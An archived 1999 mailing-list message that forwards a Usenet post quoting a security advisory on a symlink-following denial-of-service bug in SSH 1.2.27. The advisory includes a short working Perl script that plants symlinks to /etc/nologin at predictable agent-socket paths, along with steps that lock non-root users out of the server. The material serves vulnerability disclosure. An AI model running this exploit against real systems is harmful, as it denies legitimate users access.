[Fwd: Truth about ssh 1.2.27 vulnerabiltiy]

From: Marc SPARC (marcat_private)
Date: Thu Sep 23 1999 - 19:53:16 PDT

Next message: Darren Moffat - Solaris Sustaining Engineering: "Re: LD_PROFILE local root exploit for solaris 2.6"

Previous message: plasmoid deep/thc/clb: "Re: solaris DoS"
Next in thread: Tymm Twillman: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Tymm Twillman: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Dan Astoorian: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Sean-Paul Rees: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Valdis.Kletnieksat_private: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Solar Designer: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Mike Iglesias: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Alan Cox: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Eric Griffis: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Sylvain Robitaille: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Sylvain Robitaille: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Dan Astoorian: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Jeff Long: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Jeff Long: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Eric Griffis: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Dan Astoorian: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a multi-part message in MIME format.
--------------6AC62AD4B47D5DBDC9C760D7
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit



--------------6AC62AD4B47D5DBDC9C760D7
Content-Type: message/rfc822
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Path: news.ibm.net.il!ibm.net!logbridge.uoregon.edu!arclight.uoregon.edu!wn4feed!wn3feed!worldnet.att.net!12.127.16.134!attmtf!ip.att.net!remarQ-easT!remarQ60!supernews.com!remarQ.com!iquest!news1.iquest.net!not-for-mail
From: "MEF" <matthew.fearnowat_private>
Newsgroups: comp.security.ssh
Subject: Truth about ssh 1.2.27 vulnerabiltiy
X-Newsreader: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Message-ID: <l2rG3.448$f4.1323at_private>
Date: Thu, 23 Sep 1999 09:45:33 -0500
NNTP-Posting-Host: 198.70.148.65
X-Trace: news1.iquest.net 938097937 198.70.148.65 (Thu, 23 Sep 1999 09:45:37 EDT)
NNTP-Posting-Date: Thu, 23 Sep 1999 09:45:37 EDT
Xref: news.ibm.net.il comp.security.ssh:9387

I recieved this email today and wanted to know if it is something to be of
concern about.



The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com

SSH 1.2.27 vulnerable to a Denial of Service attack

------------------------------------------------------------

SSH has the option of setting up "authentication sockets", used to pass
authentication keys securely. When this is used, a socket is created on both
client and server machines; the socket created on the server uses an easy to
guess filename (based on the PID). The creation of this socket is done while
the server is acting as root and follows symlinks.


******************************

Exploit:

 - connect to remote machine
 - run the following script (creates symlinks for the next 50 PID's):

----- cut -----
#!/usr/bin/perl

$pid = $$;

$whoami = `whoami`;
chop($whoami);
mkdir("/tmp/ssh-$whoami", 0700);

for ($i = $pid; $i < $pid+50; $i++)
{
  symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}
----- cut -----


 - on local machine, execute ssh-agent1; it will produce a few lines to cut and paste into your shell.

 - ssh1 to the remote machine; enter password

The socket will have been created at /etc/nologin, preventing other non-root users from logging in. This connection too will die with "Logins are currently denied by /etc/nologin:"

This was tested on a RedHat 6.0 machine, with standard configure/make/install installation of ssh. This script should work pretty well for systems that create processes where each PID is one greater than the last; other platforms may require modifications, or many-many more links, if they're exploitable.





--------------6AC62AD4B47D5DBDC9C760D7--

Next message: Darren Moffat - Solaris Sustaining Engineering: "Re: LD_PROFILE local root exploit for solaris 2.6"
Previous message: plasmoid deep/thc/clb: "Re: solaris DoS"
Next in thread: Tymm Twillman: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Tymm Twillman: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Dan Astoorian: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Sean-Paul Rees: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Valdis.Kletnieksat_private: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Solar Designer: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Mike Iglesias: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Alan Cox: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Eric Griffis: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Sylvain Robitaille: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Sylvain Robitaille: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Dan Astoorian: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Jeff Long: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Jeff Long: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Eric Griffis: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Reply: Dan Astoorian: "Re: [Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:05:11 PDT